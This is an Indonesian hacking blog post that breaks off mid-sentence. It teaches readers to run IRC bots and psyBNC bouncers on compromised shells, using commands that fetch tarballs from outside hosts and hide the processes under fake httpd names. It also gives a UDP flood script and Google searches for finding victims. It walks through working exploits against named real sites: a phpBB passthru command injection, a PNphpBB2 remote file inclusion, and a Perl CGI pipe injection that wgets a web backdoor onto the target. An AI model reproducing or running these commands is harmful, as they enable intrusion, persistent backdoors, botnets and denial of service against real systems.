Breaking News
Loading...
Sunday, March 9, 2014

Belajar PsyBnc dan Bot MirC

8:54 AM


untuk dapat membuat bot dan psybNC, kamu harus punya shell yang bagus
lebih bagus lagi kamu pegang akses root....

klu kamu belum punya shell yang bagus dapet di ambil di

http://www.manadocoding.com/forum/viewtopic.php?t=1627

ok sekaran kita mulai caranya ...

==========================
command2 Dasar server Linux dan FreebSD:
1. uname -a;id <<== untuk melihat jenis server dan id
2. /sbin/ifconfig | grep inet<<== untuk melihat ip server
3. find / -type d -perm 777 <<== untuk melihat direktori yg tidak permission denied
4. mkdir <<== untuk membuat direktori baru example: mkdir love
5. ls -alF <<== untuk melihat semua file dalam sebuah direktory
6. wget/lwp-download/curl -f -O <<== untuk mendownload file kita kedalam server

cara membuat bot dari server Linux:
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/acz.tgz
2. cd /var/tmp;tar -zxvf acz.tgz
3. cd /var/tmp;rm -fr acz.tgz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./dssl a.txt atau cd /var/tmp;./eggdrop -m a.txt

cara membuat bot dari server FreeBsd:
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/aczbsd.tgz
2. cd /var/tmp;tar -zxvf aczbsd.tgz
3. cd /var/tmp;rm -fr acz.tgz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./eggdop -m a.txt

cara load psy dari server Linux:
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/AhoK.tar.gz
2. cd /var/tmp;tar -zxvf AhoK.tar.gz
3. cd /var/tmp;rm -fr AhoK.tar.gz
4. cd /var/tmp/AhoK;./config (IDENTD) (PORT)
5. cd /var/tmp/AhoK;./f**k
6. cd /var/tmp/AhoK;./run
kalau uda dirun coba join ke #samudra lalu test portcheck.. example `pc (nomerIP) (PORT)

cara load psy dari server FreeBsd:

1. cd /var/tmp;wget http://www.solsiden.info/psy/samsengpsy.tgz
2. cd /var/tmp;tar zxfv samsengpsy.tgz
3. cd /var/tmp;rm -fr samsengpsy.tgz
4. cd /var/tmp/samseng;./config (IDENTD) (PORT)
5. cd /var/tmp/samseng;./f**k
6. cd /var/tmp/samseng;./run

bot Portcheck, os, ip-to-country, jodoh dan dns, tinggal load aja, untuk server Linux
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/Gufi.tar.gz
2. cd /var/tmp;tar -zxvf Gufi.tar.gz
3. cd /var/tmp rm -fr Gufi.tar.gz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./eggdrop -m a.txt
kalau uda masuk botnya coba test !dns [host] | !ip2c | `pc [host] [port] | !jodoh

bot Portcheck, os, ip-to-country, jodoh dan dns, tinggal load aja, untuk server FreeBsd
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/Gufibsd.tar.gz
2. cd /var/tmp;tar -zxvf Gufibsd.tar.gz
3. cd /var/tmp rm -fr Gufibsd.tar.gz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./eggdrop -m a.txt
kalau uda masuk botnya coba test !dns [host] | !ip2c | `pc [host] [port] | !jodoh


sedikit saran
klu mau buat bot dan psyBNC, jangan terlalu banyak buatnya
dalam 1 shell injeck, soalnya nanti di kill ama dalnet


Installasi PsyBNC pada OS Windows

=================================
Instalasi psyBNC2.3.1 For Windows
=================================
DOWNLOAD
File : psybnc2.3.1.exe
http://lieur-euy.cat-on-line.com/psybnc2.3.1.exe

INSTALASI
1. Extact file psybnc2.3.1.exe pada direktory C:
2. Masuk pada direktory C:psybnc
3. Anda juga dapat merubah portnya dengan menggunakan editor text seperti Notepad Wordpad atau
yang lain, C:psybnc cari file dengan nama psybnc.conf | klik kanan | Open With ..
pada kolom [ ] Always use this program to open this file jangan di beri tanda centang
4. save : file ==>> save
5. Klik Start ==>> Run ==>> Command
6. Ikuti langkah berikut pada MS-DOS Prompt =

Microsoft(R) Windows 98
(C)Copyright Microsoft Corp 1981-1999.

C:WINDOWSDesktop>cd..

C:WINDOWS>cd..

C:>cd psybnc..

C:psybnc>psybnc.exe
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,—-.,—-.,-. ,-.,—.,–. ,-.,—-.
| O || ,-’ / / | o || | || ,–’
| _/ _ / | o< | | || |__
|_| |____/ |__| |___||_| _| ___|
Version 2.3.1 (c) 1999-2002
the most psychoid
and the cool lam3rz Group IRCnet

`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-’
Configuration File: psybnc.conf
Language File: psyBNC Language File - English
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 31337
psyBNC2.3.1-cBtITLdDMSNp started (PID 2080107)

C:psybnc>

7. Buka mIRC
8. Ubah IDENT pada mIRC Option sesuai dengan keinginan Anda
9.
Ketik /server IP Komputer Anda 31337 <<== ini port standard (belum dirubah)

-Welcome- psyBNC2.3.1
-
–psyBNC- Your IRC Client did not supporrrt a password. Please type /QUOTE PASS
yourpassword to connect.
-

8. /QUOTE PASS (pass yang Anda inginkan)
9. /addserver mesra-e.dal.net:6667
/addserver hotspeed.dal.net:6667

Untuk Setting psyBNC selanjutnya Anda dapat melihatnya di:

http://geocities.com/erahman2001/setingpsy

=====================================================
psyBNC Under Windows Anda Autorun
=====================================================

=========================================================
Menjalankan psyBNC Saat Memulai Windows (using start up)
=========================================================

Untuk menjalankan psyBNC saat masuk Windows secara otomatis, dapat menggunakan fasilitas
Start Up di start menu. Caranya cukup simpel, yaitu sbb :

Misalnya kita akan menjalankan psyBNC saat mulai Windows, caranya dengan menggunakan tip
berikut ini.

1. Buka windows Explorer, dan masuk ke direktory C:WINDOWSStart MenuProgramsStartUp
2. Buat shortcut untuk PsyBNC dengan mengklik kanan di area yang kosong, kemudian pilih
New >> ShortCut
3. Buat command line untuk notepad yaitu C:psybncpsybnc.exe atau pilih Browse
4. Klik tombol Next, kemudian Finish
5. Restart PC dan Windows akan otomatis menjalankan psybnc.

========================================================
Menjalankan psyBNC Saat Memulai Windows (using registry)
========================================================

Untuk menjalankan psyBNC saat masuk Windows secara otomatis, sebenarnya kita dapat menggunakan
fasilitas Start Up. Tetapi ada cara yang lebih advanced, yaitu dengan menggunakan registry.
Misalnya kita akan menjalankan psyBNC saat mulai Windows, caranya dengan menggunakan tip
berikut ini.

1. Buka Registry dengan Regedit : klik Start|Run| ketik Regedit | klik OK
2. Buka key [HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
Pilih Edit | New | String Value, dan beri nama C:psybncpsybnc.exe
3. Isi valuenya dengan ‘C:psybncpsybnc.exe’
4. Restart PC

=======================================================
Menjalankan psyBNC Saat Memulai Windows (using Win.ini)
=======================================================

Ini adalah cara yang lain untuk memaksa Windows menjalankan program yang kita inginkan. Dua cara
yang lain adalah dengan cara klasik yaitu dengan Start Up menu dan dengan cara yang advanced
yaitu dengan menggunakan registry.

Cara ini menggunakan file sistem Windows yaitu Win.ini. Berikut ini adalah hal - hal yang perlu
pembaca lakukan untuk menjalankan program secara otomatis dengan menggunakan file Win.ini.
Diasumsikan program yang akan dijalankan adalah psybnc.exe yang ada di direktori C:psybnc.

1. Carilah file Win.ini yang berada di diirektori C:Windows
2. Buka dengan menggunakan editor text seeperti Notepad atau yang lain
3. Carilah entri yang bernama “load”
4. Kemudian isi dengan ‘C:psybncpsybnc.exe’, sehingga lengkapnya
menjadi “load=C:psybncpsybnc.exe”
5. Pilih menu File > Save, dan restart PC

Mudah khan ??
Selamat mencoba !!!

Pasang Psybnc

ok kita ambil contoh file ini
http://www.psybnc.info/download/psybnc2.3.2-4b.exe
file size sekitar 750kb.
kita taruh di c:/

double klik file psybnc2.3.2-4b.exe
lalu akan ada dialog extract to c:\psybnc\ ikuti saja dengan klik tombol extract
setelah sukses ada kotak pesan “successfully completed the operation” klik ok
sekarang kita double klik folder c:\psybnc

disitu kita lihat ada file psybnc.exe dan ada psybnc.conf
disini kita bisa edit dulu file psybnc.conf jika ingin merubah port nya yang
defaultnya adalah 31337
berikut contoh pada file psybnc.conf
=================================
PSYBNC.SYSTEM.PORT1=31337
PSYBNC.SYSTEM.HOST1=*
PSYBNC.HOSTALLOWS.ENTRY0=*;*
=================================
baris pertama artinya psybnc listen pada port 31337 artinya nanti kita konek ke port 3317
barius kedua adalah ip listen bisa kita isikan ip dari ipkomputer yang kita install psybnc atau kita beri tanda bintang
yang artinya semua ip terdeteksi di system.
baris ketiga adalah host allow, artinya semua ip bisa loggin ke psybnc kita. jika kita spesifikasikan
ipnya misal psybnc.HOSTALLOWS.ENTRY=*.* kita beri suatu ip

ok kita anggap selesai psybnc.conf jika masih bingung biarkan saja seperti aslinya.
langkah selanjutnya kita double klik psybnc.exe
dan psybnc.exe akan dijalankan muncul dos prompt sekilas lalu menghilang bisa kalian check psybnc.exe sudah jalan lewat menu task manager

sekarang kita pergi ke mirc ( program chating favoritku :P~)

kita konek ke psybnc kita.
disini saya contohkan ip psybnc adalah 192.168.0.83 dengan port 31337 ident pertama kali bebas dan password kosong jika memakai psybnc.conf default diatas.

di mirc kita pilih options atau gambar palu di kiri atas.
isikan
full name : nama anda
email address: admin@
nickname : nickmu
alternative: nick-lain

klik ok

di status ketik perintah konek berikut
/server 192.168.0.83:31337 <<<< enter

-Welcome- psyBNC2.3.2-4
-
–psyBNC- Your IRC Client did not support a password.
Please type /QUOTE PASS yourpassword to connect.

/QUOTE PASS 123456 <<< ketik contoh password 123456 (bisa disi password lain)

status -psyBNC akan muncul:

<-psyBNC> Welcome xxx !
<-psyBNC> You are the first to connect to this new proxy server.
<-psyBNC> You are the proxy-admin. Use ADDSERVER to add a server so the bouncer may connect.
<-psyBNC> psyBNC2.3.2-4 Help (* = BounceAdmin only)
<-psyBNC> ————————————–
<-psyBNC> BHELP BWHO - Lists all Users on the Bouncer
<-psyBNC> BHELP PASSWORD - Sets your or another Users Password(Admin)
<-psyBNC> BHELP BVHOST - Sets your vhost to connect thru
<-psyBNC> BHELP PROXY - Sets your proxy to connect thru
<-psyBNC> BHELP SETUSERNAME - Sets your User Name
<-psyBNC> BHELP SETAWAY - Sets your away-Text when you leave
<-psyBNC> BHELP SETLEAVEMSG - Sets your Leave-MSG when you leave
<-psyBNC> BHELP LEAVEQUIT - If set to 1, parts all channels on quit
<-psyBNC> BHELP SETAWAYNICK - Sets your nick when you are offline
<-psyBNC> BHELP JUMP - Jumps to the next IRC-Server
<-psyBNC> BHELP BQUIT - Quits your current Server Connection
<-psyBNC> BHELP BCONNECT - Reconnects a bquitted Connection
<-psyBNC> BHELP AIDLE - Enables/Disables Antiidle
<-psyBNC> BHELP AUTOREJOIN - Enables/Disables Auto-Rejoin
<-psyBNC> BHELP ADDSERVER - Adds an IRC-Server to your Serverlist
<-psyBNC> BHELP DELSERVER - Deletes an IRC-Server by number
<-psyBNC> BHELP LISTSERVERS - Lists all IRC-Servers added
<-psyBNC> BHELP ADDNETWORK - Adds a seperate Network to your client
<-psyBNC> BHELP DELNETWORK - Deletes a Network from your client
<-psyBNC> BHELP SWITCHNET - Switches to a given Network
<-psyBNC> BHELP ADDOP - Adds a User who may get Op from you
<-psyBNC> BHELP DELOP - Deletes an added User who got Op
<-psyBNC> BHELP LISTOPS - Lists all added Ops
<-psyBNC> BHELP ADDAUTOOP - Adds a User who gets Auto-Op from you
<-psyBNC> BHELP DELAUTOOP - Deletes an added User who got Op
<-psyBNC> BHELP LISTAUTOOPS - Lists all added Auto-Ops
<-psyBNC> BHELP ADDBAN - Adds a ban (global or to a channel)
<-psyBNC> BHELP DELBAN - Deletes a ban by Number
<-psyBNC> BHELP LISTBANS - Lists all bans
<-psyBNC> BHELP ADDASK - Adds a host/bot to ask Op from
<-psyBNC> BHELP DELASK - Deletes a host/bot to ask Op by Number
<-psyBNC> BHELP LISTASK - Lists the hosts/bots to ask Op from
<-psyBNC> BHELP ADDIGNORE - Adds a hostmask/contentfilter to the ignores
<-psyBNC> BHELP DELIGNORE - Deletes a hostmask/contentfilter from the ignores
<-psyBNC> BHELP LISTIGNORES - Lists the currently added ignores
<-psyBNC> BHELP ADDDCC - Adds a DCC-Connection to a bot
<-psyBNC> BHELP LISTDCC - Lists all added DCC-Connectionc
<-psyBNC> BHELP DELDCC - Deletes a DCC-Connection by number
<-psyBNC> BHELP DCCCHAT - Offers a DCC Chat to a given IRC User
<-psyBNC> BHELP DCCANSWER - Answers to a DCC Chat-Request
<-psyBNC> BHELP DCCENABLE - Enables/Disables DCC thru psybnc
<-psyBNC> BHELP DCCSEND - Sends a file to a given IRC User
<-psyBNC> BHELP DCCGET - Gets a DCC Send File from an IRC User
<-psyBNC> BHELP DCCSENDME - Sends the bouncer User a File
<-psyBNC> BHELP AUTOGETDCC - always get offered Files
<-psyBNC> BHELP DCCCANCEL - Cancels a dccchat or a transfer
<-psyBNC> BHELP PLAYPRIVATELOG - Plays your Message Log
<-psyBNC> BHELP ERASEPRIVATELOG - Erases your Message Log
<-psyBNC> BHELP ADDLOG - Adds a Log source / filter
<-psyBNC> BHELP DELLOG - Deletes a Log source by number
<-psyBNC> BHELP LISTLOGS - Lists all added Log sources/filters
<-psyBNC> BHELP PLAYTRAFFICLOG - Plays the Traffic Log
<-psyBNC> BHELP ERASETRAFFICLOG - Erases the Traffic Log
<-psyBNC> BHELP ENCRYPT - Encrypts talk to a given channel/user
<-psyBNC> BHELP DELENCRYPT - Deletes an encryption entry by number
<-psyBNC> BHELP LISTENCRYPT - Shows a List of encrypted talks
<-psyBNC> BHELP TRANSLATE - Adds a translator to/from channels/users
<-psyBNC> BHELP DELTRANSLATE - Deletes a translator by number
<-psyBNC> BHELP LISTTRANSLATE - Shows a List of translated talks
<-psyBNC> BHELP * BREHASH - Rehashes the proxy and resets all Connections
<-psyBNC> BHELP * MADMIN - Gives a User an Admin flag
<-psyBNC> BHELP * UNADMIN - Removes the Admin flag from a User
<-psyBNC> BHELP * BKILL - Kills a User from the proxy
<-psyBNC> BHELP * SOCKSTAT - Shows/Logs the current Connections
<-psyBNC> BHELP * ADDUSER - Adds a new User to the Bouncer
<-psyBNC> BHELP * DELUSER - Deletes a User from the Bouncer
<-psyBNC> BHELP * NAMEBOUNCER - Names your bouncer (needed for linking)
<-psyBNC> BHELP * LINKTO - Adds a bouncer Link to the Host/Port
<-psyBNC> BHELP * LINKFROM - Adds a bouncer Link from your Bouncer
<-psyBNC> BHELP * RELAYLINK - Allows or disables a relayable Link
<-psyBNC> BHELP * DELLINK - Deletes a Link to a bouncer
<-psyBNC> BHELP LISTLINKS - Lists all Links to/from the Bouncer
<-psyBNC> BHELP * RELINK - Resets a link to a bouncer by number
<-psyBNC> BHELP * PLAYMAINLOG - Plays the Connection Log
<-psyBNC> BHELP * ERASEMAINLOG - Erases the Connection Log
<-psyBNC> BHELP * ADDALLOW - Adds a host allow to connect
<-psyBNC> BHELP * DELALLOW - Deletes a host allow
<-psyBNC> BHELP * LISTALLOW - Lists the host allows on your proxy
<-psyBNC> BHELP SRELOAD - Reloads the Script for the User
<-psyBNC> BHELP LISTTASKS - Lists the current running tasks
<-psyBNC> BHELP * SETLANG - Sets the language (global)
<-psyBNC> BHELP BHELP - Lists this help or help on a topic
<-psyBNC> BHELP Use /QUOTE bhelp for details.
<-psyBNC> BHELP - End of help
<-psyBNC> Fri Jan 4 17:34:25 :New User:admin (xxx) added by admin
<-psyBNC> Fri Jan 4 17:34:31 :User admin () has no server added

——————————————————————
lalu kita ketik
/addserver irc.dal.net:6667 <<< contoh untuk irc server dalnet

<-psyBNC> Server irc.dal.net port 6667 (password: None) added.
<-psyBNC> Fri Jan 4 17:37:31 :User admin () trying irc.dal.net port 6667 ().
<-psyBNC> Fri Jan 4 17:37:32 :User admin () connected to irc.dal.net:6667 ()

Perintah2 dalam penggunaan psyBNC

Perintah2 dalam penggunaan psyBNC

/server (alamat shell anda)(port)
/quote pass (password psyBNC anda)

contohnya:
/server ltnx.com 1979
/quote pass klowor
Setelah melakukan tahap-tahap di atas anda dapat melakukan arahan-arahan yang ada dalam psyBNC anda sebagai berikut:

/BHELP
Arahan di atas adalah untuk menampilkan menu-menu atau arahan-arahan yang ada pada psyBNC yang anda pakai tersebut.

/BWHO
Digunakan untuk melihat daftar orang-orang atau user yang sedang menggunakan psyBNC yang satu account dengan psyBNC anda.

/ADDUSER
Berfungsi untuk menambah user/pengguna baru dalam account psyBNC anda. Hanya admin psyBNC saja yang boleh memakai arahan ini.
Contoh:
/ADDUSER ident:username (/adduser senthod:phatygeni)

/DELUSER
Untuk menghapus user/pengguna tertentu yang ada dalam account psyBNC anda. Hanya admin yang boleh menghapus user/pengguna.
Contoh:
/DELUSER ident (/deluser senthod)

/BKILL
Untuk meng-kill atau memutus connection user tertentu yang ada di dalam account psyBNC anda tetapi arahan ini tidak akan
menghapus user tersebut tapi hanya akan membuat user disconnect atau putus putus connection untuk sementara.
Hanya admin psyBNC saja yang dapat melakukan arahan ini.

/PASSWORD
Digunakan untuk menukar password atau kata rahsia pada psyBNC anda apabila anda khuatir password anda akan mudah diterka
oleh orang atau pun telah diketahui oleh orang yang tidak anda kehendaki.
Contoh:
/password
/password ole-ole

/ADDSERVER
Untuk memasukkan server-server yang anda kehendaki, misalnya irc.dal.net 6667
Contoh:
/addserver irc.dal.net:6667

/DELSERVER
Digunakan untuk memadamkan server yang ada pada daftar/list pada psyBNC anda.
Contoh:
/delserver 1 (tergantung nomor server pada daftar server yang ada di psyBNC anda)

/LISTSERVERS
Untuk melihat daftar server yang ada pada psyBNC anda.

/JUMP
Untuk menukar atau mengganti server yang anda pakai ke server berikutnya yang ada
pada daftar (list) pada psy-BNC anda yang anda set sewaktu anda pertama kali menggunakan PSYBNC.

/BQUIT
Untuk keluar dari network atau memutuskan sambungan dari server IRC dan nick anda akan tidak terpampang di channel sebelum anda connectkan kembali.

/BCONNECT
Untuk menyambung kembali ke network/server IRC setelah anda melakukan arahan /BQUIT supaya nick anda boleh terpampang kembali pada Channel IRC anda.

/SETAWAY
Arahan ini untuk menampilkan pesan anda ketika anda tidak di dalam IRC atau tidak online. Pesan ini akan nampak bila nick anda
di-whois-kan oleh rakan anda atau user lain yang ingin mengetahui status anda.
Contoh:
/setaway (pesan anda)
/setaway maaf saya sedang berbulan madu jadi belum boleh online dalam waktu ini

/SETAWAYNICK
Untuk mengubah atau menukar nick anda ketika anda keluar dari IRC (offline)
Contoh:
/setaway (nick)
/setaway KUJANG^AFK

/SETLEAVEMSG
Untuk menampilkan teks atau pesan anda ketika anda keluar dari IRC (offline.)
Contoh:
/setleavemsg (pesan)
/setleavemsg Sorry, sila tinggalkan pesanan suara anda....!!

/SETUSERNAME
Untuk mengganti user name yang tampil setelah IP address anda ketika di-whois.
Contoh:
/setusername (nama yang anda kehendaki)
/setusername sontoloyo

/VHOST
Untuk mengganti Vhost (Virtual Host) atau IP address psyBNC anda ke Vhost yang anda kehendaki.
Virtual Host atau Vhost adalah address yang anda gunakan pada ketika anda online.
Contoh:
/vhost (vhost yang anda kehendaki dan disediakan oleh shell anda)
/vhost aston.crack.in.the.box.shell.org

/PLAYPRIVATELOG
Untuk menampilkan pesan-pesan untuk anda selama anda tidak berada di IRC (offline),
pesan ini dapat dirakam secara automatik ketika seseorang melakukan msg atau private msg.
Untuk menggunakan arahan ini anda hanya cukup me-layprivatelog maka automatik akan tampil pesan-pesan untuk anda dalam sebuah windows
dengan nama psyBNC atau message.

/ERASEPRIVATELOG
Untuk menghapus privatelog atau pesan yang telah anda baca dan anda tidak membutuhkan pesan-pesan itu lagi.

Cara Mudah Untuk membuat BOT

Cara Pertama:

NB: BOT Ini akan otomatis jalan pada server dalnet " khusus Untuk dalnet server "
1. wget brendanspaar.com/modules/coppermine/albums/kinabot.tar.gz
atau brendanspaar.com/modules/coppermine/albums/kinabot.tar.bz2 <--untuk tambahan creat.tcl
2. tar -zvxf kinabot.tar.gz untuk kinabot.tar.gz
tar -jxvf kinabot.tar.bz2 untuk kinabot.tar.bz2
3. cd .kin
4. ./creat fileconf nick ident IP channel owner

contoh: ./creat defaced Mr_Lam3r 212.88.174.3 defaced dr_zig
defaced.................... file conf yg akan dibuat (akan terbuat dgn sendirinya)
Mr_Lam3r ...............nick bot
dr_zig ...................ident bot
212.88.174.3 .......IP shell
defaced ..................... nama channel, jangan pake #
dr_zig ................ nick owner

catatan: bila nick mengandung karakter yg gak biasa mis: ` maka sebelum karakter tsb tambahkan tanda \ (backslash)
contoh: mich`keren -> mich\`keren

5. ./eggdrop -m fileconf
atau ./run fileconf fakename
fakename dapat dilihat dgn perintah ps x, cari aja proses yg paling banyak terlihat

contoh ./run a.txt /usr/local/apache/bin/httpd ( /usr/local/apache/bin/httpd = fake namenya)
Udah deh! tunggu aja di channel, ato whois aja nicknya.
Bila ingin tambahkan tcl lain seperti creat.tcl :

2. ./tcl -t fileconf creat.tcl
contoh: ./tcl -t a creat.tcl ( lihat keterangan dengan perintah ./tcl )
untuk penggunaan bisa diliat dengan command/perintah !creat dichannel

Cara Kedua:

wget http://geocities.com/g4ptek/tools/bot.tar.gz
tar -zxvf bot.tar.gz
rm -rf bot.tar.gz
cd .share
# download bot.txt ke kompi lalu edit settingnya sesuai kebutuhan, kemudian upload lagi
# contoh: http://verzekering.it/voorwaarden/.conf/scripts/bot4.txt
# klo mau nambah tcl masuk ke folder .share/scripts/ download semua tcl yg perlu dr http://verzekering.it/voorwaarden/.conf/scripts/ dan tambahkan kedalam folder .share/scripts/
# klo pengen tcl-nya jalan jgn lupa tambahkan ke file /.share/bot.txt (bagian paling bawah) terus upload lagi
./shade "httpd" ./eggdrop -m bot.txt
# usage:
# pv bot kamu di channel
# /msg nick-bot-kamu auth
# /msg nick-bot-kamu pass
# /msg nick-bot-kamu auth
Cara Buat Psy Dari shell

cd /var/tmp
mkdir ...
cd ...
pwd
wget www.acspakistan.com/sh/aris.tar.gz
tar -zxvf aris.tar.gz
cd ChuCu
./config
./fuck
./run
########################

Cara Buat Bot

wget http://www.discountcarshop.co.uk/data/sh/basica.tar.gz
curl -f -O http://www.discountcarshop.co.uk/data/sh/basica.tar.gz
tar -zxvf basica.tar.tz
cd scripts
rm -fr ary.tcl
curl -f -O http://www.discountcarshop.co.uk/data/sh/netgate.tcl
mv netgate.tcl ary.tcl
cd ..
./serly fileconf nick ident IP channel owner
./serly a.txt asen-keren ident 209.59.132.199 green^hause AseN
./run a.txt /usr/local/apache/bin/httpd
########################

Cara Bindtykan phpBB2 Ke Putty
cd /tmp;wget geocities.com/c0_pampers/as.tar.gz
cd /tmp;curl -f -O geocities.com/c0_pampers/as.tar.gz
cd /tmp;tar -zxvf as.tar.gz
cd /tmp/.asen;./fuck;./run
cd /tmp/awyeah;./fuck
cd /tmp/awyeah;./run

Nb: netstat -a <- Buat Liat Port
##########################

Cara Buat Cgi dari Shell
01. Login Shell
02. wget www.geocities.com/wisen_asen/a.pl
03. ftp
04. login
05. Pasword
06. User
07. cd www
08. 250 CWD command successful
09. ls -alF
10. mput a.pl
11. chmod 755 a.pl

##########################

Buat Tembak Ip Org Dari Shell
wget geocities.com/kupu2hitamputih/udppl.txt
mv udppl.txt AseN.pl
chmod 755 AseN.pl
perl AseN.pl 60000 60000


http://lieur-euy.cat-on-line.com/psybnc2.3.1.exe <-------- psy



Hacking PNPhpbb
Hacking PNphpBB2

1. Gunakan paman google, cari situs yang menggunakan PNphpBB2
keywordnya = allinurl:pnphpbb2 site:ru

2. Masuk ke halaman utama situs sasaran. -->> http://sasaran.ru

3. Tambahkan address-nya sehingga menjadi
http://sasaran.ru/modules/PNphpBB2/includes/function_admin.php?phpbb_root_path=http://nobodycare.com/php.jpg?

4. Jika yang muncul adalah php injection, selamat anda telah berhasil masuk ke dalam system korban. :-)



Hacking PHPBB 2.0.10
hacking phpbb 2.0.10

1. Cari sasaran menggunakan paman google. keywordnya = phpbb 2.0
Jangan menggunakan keyword viewtopic karena gak akan diijinkan.

2. Kunjungi alamat forum yang didapat. Lihat dan kunjungi hingga pada bagian address tertulis
http://sasaran.com/viewtopic.php?t=4(angka 4 bisa saja lain)

3. Kemudian pada bagian address coba tambahkan &highlight=%2527
http://sasaran.com/viewtopic.php?t=4&highlight=%2527

4. Jika yang muncul adalah error, maka bererti forumnya vuln (bolong).
Jika tidak, cari sasaran lain. :-)

5. Setelah Muncul error coba tambahkan lagi menjadi

http://sasaran.com/viewtopic.php?t=t=4&highlight=%2527.passthru($HTTP_GET_VARS[cmd]).%2527&cmd=ls -al

6.
Jika yang muncul adalah daftar nama file dan direktori, selamat anda telah berhasil masuk ke dalam sysytem sasaran

7. Jika ada error tetapi eksekusi perintah cmd= tidak berjalan kemungkinan fungsi passthru sudah dimatikan oleh admin. Cari sasaran lain.

Contoh forum yang vuln :
http://batam.linux.or.id/forumlinux/viewtopic.php?t=19


Thursday, August 25, 2005
CGI - Perl Exploit
EXPLOITASI COMMAND EXECUTION DI PERL / CGI
by BLAHPLOK aka CHOI


Khusus buat #e-c-ho, #indonesiahack, #jambihackerlink

Disini nggak akan dijelaskan mengapa command execution ini bisa terjadi,
Kalo ingin mengcari tahu, silahkan mencari di google dan baca …
So, Kita langsung ajah….

SATU :
Mencari Target…
1. Buka Opera, internet explorer, mozilla dll
2. Masukkan alamat www.google.com di address bar
3. Masukkan keyword pencarian.
Catatan :
Trick menggunakan keyword dalam mencari bug cgi / perl :
a. Gunakan words / kata2 yang mengarah secara langsung pada hal yang akan kita cari
b. Gunakan key “allinurl:”
c. Gunakan tanda petik ganda (“) jika diperlukan
contoh 1:
allinurl: “news.cgi?news=” txt
Ini akan mencari semua url yang mengandung url news.cgi?news=, dan file yang akan
Di buka yakni file dengan ektensi txt.
Contoh 2 :
allinurl: cgi action dat
ini akan mencari semua url yang ada kata cgi, action dan dat, jadi biasanya url yang
didapat adalah url yang mangandung file dengan akhiran .cgi ato .pl diikuti dengan
parameter action dan membuka file dengan ektensi dat.
(dengan key inilah bug WPS_SHOPPING ditemukan).
4. Oke sekarang kita telah memasukkan keyword yang kita inginkan. Dalam contoh ini
kita akan mengunakan keyword = allinurl: cgi action file dat -> lalu klick cari/search
dan hasilnya ………………………………………..:

DUA:
Exploitasi:

1. Sekarang kita masuk ke exploitasi :
Dalam exploitasi cgi/perl sangat mudah sekali. Yakni kita hanya memerlukan dua
Karackter penting yaitu ‘|’ dan ‘;’ yang di letakkan pada tempat nama file yang akan
dibuka.
Sebagai contoh:
Sekarang kita lihat url pada halaman pertama, yakni :
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat&page=0
Klick kanan url tersebut dan klick open in new window.
Setelah terbuka alamat url tersebut, Sekarang kita tambahkan character penting
tersebut diatas, yakni pipe ‘|’. Pada akhir nama file yang akan dibuka yakni :
file=.file0011.dat|ls|
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|ls|&page=0
(ls dalam command di linux shell adalah sama dengan dir pada windows, yakni
melihat seluruh file directory aktif)
yupe, sekarang kita bisa melihat pada tampilan halaman, ada perubahan tampilan,
yakni disitu terlihat yang semula berisi huruf2 jepang, sekarang ada tulisan file. Itu
artinya webserver tersebut vulnerable untuk di hack…!!!!
Catatan: Tidak semua file cgi yang vulnerable ketika kita tambahkan char ‘|ls|’
Akan menampilkan file2-nya di browser. Ada yang tidak terlihat dan ada yang terlihat.
Yupe, sekarang coba kita lihat id kita:
http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|id|&page=0
hasilnya : uid = bla bla bla
Asal uid bukan nobody, maka kita nggak akan kesulitan untuk langkah selanjutnya.

2. Memasukkan backdoor. (web backdoor)
Kita bisa memasukkan beberapa jenis backdoor seperti bindtty dll............
Kenapa saya memilih web backdoor..??? karena web backdoor ini merupakan
Backdoor yang sangat ampuh (menurut saya). Sulit di deteksi (apalagi kalo pake
penyamaran nama file yang bener2 ok)
Tidak terpengaruh oleh firewall dan admin web pada saat mengecek koneksi yang
terjadi pada web-nya, yang mereka tau adalah kita hanya seperti browsing biasa.
Karena kita melakukannya lewat port 80….!!!
Saya menggunakan backdoor dari "http://www.rohitab.com/cgiscripts/cgitelnet.txt"
Baik sekarang kita akan melakukan uploading backdoor tersebut ke web target.
Dalam mengupload backdoor, kita akan menggunakan command wget. Yakni
command di linux yang khusus untuk download ke web server.
Catatan :
Tidak semua server menginstall wget, dan jika itu terjadi, maka pilihan kita selanjutnya
Adalah menggunakan lwp-download, fasilitas download dari perl.

Contoh : http://www.mikazo.net/cgiscript/sample/zdiary/zdiary.cgi?action=diary_view&menutitle=%E5%A2%97%E6%AE%96%EF%BC%9F&file=./file0011.dat|wget http://www.rohitab.com/cgiscripts/cgitelnet.txt|&page=0
Kita mengambil cgitelnet.txt dari http://www.rohitab.com/cgiscripts/cgitelnet.txt,
Yang selanjutnya akan di save di http://www.mikazo.net/cgiscript/sample/zdiary/
Sekarang kita check apakah kita berhasil ato tidak.
http://www.mikazo.net/cgiscript/sample/zdiary/cgitelnet.txt

jika ada pesan error file not found, berarti kita gagal menggunakan wget, selanjutnya
